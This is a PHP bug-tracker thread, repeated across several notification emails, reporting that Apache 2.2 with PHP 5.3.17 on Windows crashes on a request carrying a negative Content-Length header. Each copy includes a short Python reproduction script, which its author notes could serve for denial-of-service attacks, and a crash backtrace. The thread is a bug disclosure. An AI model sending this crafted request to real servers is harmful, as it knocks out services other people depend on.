[PHP-BUG] Bug #63200 [NEW]: Apache 2.2 crashes when PHP called with negative Content-Length HTTP header
From: chris at whyley dot com Operating system: Windows Server 2003 PHP version: 5.3.17 Package: Reproducible crash Bug Type: Bug Bug description:Apache 2.2 crashes when PHP called with negative Content-Length HTTP header Description: Apache 2.2 with PHP 5.3.17 on Windows Server 2003 can be made to repeatably crash by doing the following: (1) Configure your Apache server to use a custom error handling page for the HTTP 413 error (Request entity too large) by inserting this line into your httpd.conf: ErrorDocument 413 /error/ (2) Run the Python test script detailed below to send an HTTP GET request to the server with a negative integer for the HTTP "Content-Length" header and with the "Accept-Encoding" header set to "gzip, deflate" When this is run, Apache crashes with the following error: [Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length [Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status 3221225477 -- Restarting. This issue is a particular problem in the wild where many modern browsers aren't capable of handling file uploads over 2GB in size - instead of posting an accurate filesize for the Content-Length header they use a negative integer instead, causing the Apache server running PHP to crash. For further information on this see http://www.motobit.com/help/scptutl/pa98.htm The script could be used to perform DOS attacks on vulnerable systems. Test script: --- #!/usr/bin/python import socket, sys target = "10.211.55.3" port = 80; request = "GET / HTTP/1.1\n" request += "Host: "+target+"\n" request += "Accept-Encoding:gzip, deflate\n" request += "Content-Length: -1\n\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((target, port)) except: print "[-] Connection to %s:%s failed!" % (target, port) sys.exit(0) print "[+] Sending HTTP request. Check for crash on target." s.send(request) s.close() Expected result: Stable Apache, no crash. Actual result: -- Thread 2 - System ID 3008 Entry point msvcrt!_endthreadex+3a Create time 10/2/2012 2:29:08 PM Time spent in user mode 0 Days 0:0:0.0 Time spent in kernel mode 0 Days 0:0:0.15 Full Call Stack Function Arg 1 Arg 2 Arg 3 Arg 4 Source php5ts!zend_hash_index_find+17 016f3460 000d 018ee6c0 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_hash.c @ 985 php5ts!_zend_list_delete+27 000d 016b0150 029811c0 016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_list.c @ 55 + 27 php5ts!_php_stream_free+ae 029811c0 0003 016b0150 029811c0 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\streams\streams.c @ 399 + a php5ts!php_zend_stream_mmap_closer+1a 029811c0 016b0150 0290a4e0 007339f4 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1192 + 9 php5ts!zend_file_handle_dtor+2a 0290a4e8 016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_stream.c @ 316 + 8 php5ts!file_handle_dtor+14 0290a4e8 018ee828 018ee798 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_compile.c @ 174 + b php5ts!zend_llist_del_element+71 016b1754 018ee828 007d9810 016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_llist.c @ 99 + 36 php5ts!zend_destroy_file_handle+26 018ee828 016b0150 016b0150 016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_language_scanner.l @ 242 php5ts!zend_execute_scripts+c4 0002 016b0150 0001 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend.c @ 1234 php5apache2_2!php_handler+64c 00fba200 006348e0 00fba200 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 671 + 13 libhttpd!ap_run_handler+25 00fba200 6eed3de0 00fba200 00634f68 libhttpd!ap_invoke_handler+b0 00fb8938 018ee8f8 6ff0ef68 libhttpd!ap_internal_redirect+37 00634f68 00fb8938 00eb6c50 019d libhttpd!ap_die+1e8 00fb8938 0001 00fba118 libhttpd!ap_http_header_filter+9f 00fb96f8 00fba118 00fba118 018ee974 libhttpd!ap_pass_brigade+52 00fb96f8 00fba118 00fba118 libhttpd!ap_content_length_filter+a9 00fb96e0 00eb6cb0 00fb96c8 018ee9e0 libhttpd!ap_pass_brigade+52 00fb96e0 00fba118 6fba4309 00fba118 libhttpd!ap_byterange_filter+474 00fb96c8 00fba118 00fba060 018eea1c libhttpd!ap_pass_brigade+52 00fb96c8 00fba118 00eb6cb0 00fba118 mod_deflate+1352 00fba060 00fba118 00fba0c0 018eea58 libhttpd!ap_pass_brigade
Bug #63200 [Com]: Apache 2.2 crashes when PHP called with negative Content-Length HTTP header
Edit report at https://bugs.php.net/bug.php?id=63200&edit=1 ID: 63200 Comment by: chris at whyley dot com Reported by:chris at whyley dot com Summary:Apache 2.2 crashes when PHP called with negative Content-Length HTTP header Status: Feedback Type: Bug Package:Reproducible crash Operating System: Windows Server 2003 PHP Version:5.3.17 Block user comment: N Private report: N New Comment: I have not tested this issue under version 5.4 as my environment is setup for 5.3.17 - Are you able to recreate in 5.3.17 ? It always crashes no matter what I have in index.php - in fact I can call any page and cause the crash to happen. Previous Comments: [2012-10-05 04:26:26] larue...@php.net I can not reproduce this with 5.4, and from the backtrace, it seems crash in another place. so, is it related with your index.php? does it always crash no matter what the index.php is? [2012-10-02 14:45:02] chris at whyley dot com Description: Apache 2.2 with PHP 5.3.17 on Windows Server 2003 can be made to repeatably crash by doing the following: (1) Configure your Apache server to use a custom error handling page for the HTTP 413 error (Request entity too large) by inserting this line into your httpd.conf: ErrorDocument 413 /error/ (2) Run the Python test script detailed below to send an HTTP GET request to the server with a negative integer for the HTTP "Content-Length" header and with the "Accept-Encoding" header set to "gzip, deflate" When this is run, Apache crashes with the following error: [Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length [Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status 3221225477 -- Restarting. This issue is a particular problem in the wild where many modern browsers aren't capable of handling file uploads over 2GB in size - instead of posting an accurate filesize for the Content-Length header they use a negative integer instead, causing the Apache server running PHP to crash. For further information on this see http://www.motobit.com/help/scptutl/pa98.htm The script could be used to perform DOS attacks on vulnerable systems. Test script: --- #!/usr/bin/python import socket, sys target = "10.211.55.3" port = 80; request = "GET / HTTP/1.1\n" request += "Host: "+target+"\n" request += "Accept-Encoding:gzip, deflate\n" request += "Content-Length: -1\n\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((target, port)) except: print "[-] Connection to %s:%s failed!" % (target, port) sys.exit(0) print "[+] Sending HTTP request. Check for crash on target." s.send(request) s.close() Expected result: Stable Apache, no crash. Actual result: -- Thread 2 - System ID 3008 Entry point msvcrt!_endthreadex+3a Create time 10/2/2012 2:29:08 PM Time spent in user mode 0 Days 0:0:0.0 Time spent in kernel mode 0 Days 0:0:0.15 Full Call Stack Function Arg 1 Arg 2 Arg 3 Arg 4 Source php5ts!zend_hash_index_find+17 016f3460 000d 018ee6c0 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_hash.c @ 985 php5ts!_zend_list_delete+27 000d 016b0150 029811c0 016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_list.c @ 55 + 27 php5ts!_php_stream_free+ae 029811c0 0003 016b0150 029811c0 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\streams\streams.c @ 399 + a php5ts!php_zend_stream_mmap_closer+1a 029811c0 016b0150 0290a4e0 007339f4 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1192 + 9 php5ts!zend_file_handle_dtor+2a 0290a4e8 016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_stream.c @ 316 + 8 php5ts!file_handle_dtor+14 0290a4e8 018ee828 018ee798 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_compile.c @ 174 + b php5ts!zend_llist_del_element+71 016b1754 018ee828 007d9810 016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_llist.c @ 99 + 36 php5ts!zend_destroy_file_handle+26 018ee828 016b0150 016b0150 016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_language_scanner.l @ 242 php5ts!zend_execute_scripts+c4 0002 016b0150 0001 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend.c @ 1234 php5apache2_2!php_handler+64c 00fba200 006348e0 00fba200 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\sapi\apache2handler\sapi_apache2.c @ 671 +
Bug #63200 [NoF->Opn]: Apache 2.2 crashes when PHP called with negative Content-Length HTTP header
Edit report at https://bugs.php.net/bug.php?id=63200&edit=1 ID: 63200 User updated by:chris at whyley dot com Reported by:chris at whyley dot com Summary:Apache 2.2 crashes when PHP called with negative Content-Length HTTP header -Status: No Feedback +Status: Open Type: Bug Package:Reproducible crash Operating System: Windows Server 2003 PHP Version:5.3.17 Block user comment: N Private report: N New Comment: Re-opening this bug as it still exists in the 5.3 stream. Previous Comments: [2013-02-18 00:36:03] php-bugs at lists dot php dot net No feedback was provided. The bug is being suspended because we assume that you are no longer experiencing the problem. If this is not the case and you are able to provide the information that was requested earlier, please do so and change the status of the bug back to "Open". Thank you. [2012-10-05 10:26:01] chris at whyley dot com I have not tested this issue under version 5.4 as my environment is setup for 5.3.17 - Are you able to recreate in 5.3.17 ? It always crashes no matter what I have in index.php - in fact I can call any page and cause the crash to happen. [2012-10-05 04:26:26] larue...@php.net I can not reproduce this with 5.4, and from the backtrace, it seems crash in another place. so, is it related with your index.php? does it always crash no matter what the index.php is? [2012-10-02 14:45:02] chris at whyley dot com Description: Apache 2.2 with PHP 5.3.17 on Windows Server 2003 can be made to repeatably crash by doing the following: (1) Configure your Apache server to use a custom error handling page for the HTTP 413 error (Request entity too large) by inserting this line into your httpd.conf: ErrorDocument 413 /error/ (2) Run the Python test script detailed below to send an HTTP GET request to the server with a negative integer for the HTTP "Content-Length" header and with the "Accept-Encoding" header set to "gzip, deflate" When this is run, Apache crashes with the following error: [Tue Oct 02 13:46:16 2012] [error] [client 10.211.55.3] Invalid Content-Length [Tue Oct 02 13:46:22 2012] [notice] Parent: child process exited with status 3221225477 -- Restarting. This issue is a particular problem in the wild where many modern browsers aren't capable of handling file uploads over 2GB in size - instead of posting an accurate filesize for the Content-Length header they use a negative integer instead, causing the Apache server running PHP to crash. For further information on this see http://www.motobit.com/help/scptutl/pa98.htm The script could be used to perform DOS attacks on vulnerable systems. Test script: --- #!/usr/bin/python import socket, sys target = "10.211.55.3" port = 80; request = "GET / HTTP/1.1\n" request += "Host: "+target+"\n" request += "Accept-Encoding:gzip, deflate\n" request += "Content-Length: -1\n\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((target, port)) except: print "[-] Connection to %s:%s failed!" % (target, port) sys.exit(0) print "[+] Sending HTTP request. Check for crash on target." s.send(request) s.close() Expected result: Stable Apache, no crash. Actual result: -- Thread 2 - System ID 3008 Entry point msvcrt!_endthreadex+3a Create time 10/2/2012 2:29:08 PM Time spent in user mode 0 Days 0:0:0.0 Time spent in kernel mode 0 Days 0:0:0.15 Full Call Stack Function Arg 1 Arg 2 Arg 3 Arg 4 Source php5ts!zend_hash_index_find+17 016f3460 000d 018ee6c0 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_hash.c @ 985 php5ts!_zend_list_delete+27 000d 016b0150 029811c0 016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_list.c @ 55 + 27 php5ts!_php_stream_free+ae 029811c0 0003 016b0150 029811c0 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\streams\streams.c @ 399 + a php5ts!php_zend_stream_mmap_closer+1a 029811c0 016b0150 0290a4e0 007339f4 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\main\main.c @ 1192 + 9 php5ts!zend_file_handle_dtor+2a 0290a4e8 016b0150 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_stream.c @ 316 + 8 php5ts!file_handle_dtor+14 0290a4e8 018ee828 018ee798 c:\php-sdk\snap_5_3\vc9\x86\php-5.3.17\zend\zend_compile.c @ 174 + b ph
